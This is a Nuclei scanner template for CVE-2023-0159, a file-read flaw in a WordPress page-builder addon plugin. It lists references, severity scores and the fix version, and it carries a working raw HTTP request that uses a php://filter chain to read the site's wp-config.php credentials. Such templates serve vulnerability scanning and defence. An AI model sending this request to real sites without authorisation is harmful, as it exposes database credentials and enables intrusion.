nuclei-templates/http/cves/2023/CVE-2023-0159.yaml

49 lines
2.0 KiB
YAML

id: CVE-2023-0159
info:
name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
author: c4sper0
severity: high
description: |
The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
remediation: Fixed in 1.9.1
reference: |
- https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
- https://github.com/im-hanzou/EVCer
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/xu-xiang/awesome-security-vul-llm
- https://wordpress.org/plugins/extensive-vc-addon/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-0159
epss-score: 0.00199
epss-percentile: 0.56869
cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*
metadata:
vendor: wprealize
product: extensive_vc_addons_for_wpbakery_page_builder
framework: wordpress
publicwww-query: "/wp-content/plugins/extensive-vc-addon/"
tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"status":"success","message":"Items are loaded","data":'
- type: status
status:
- 200
# digest: 4a0a004730450221009c218f291c5363beefd7ce01020284bf03b70918ba816b90527242a2167e5b85022014a99ea6fb8ea862e3d2983fa1fa38e7e3fc0e4d3cd8e49d315b0226c8027209:922c64590222798bb761d5b6d8e72950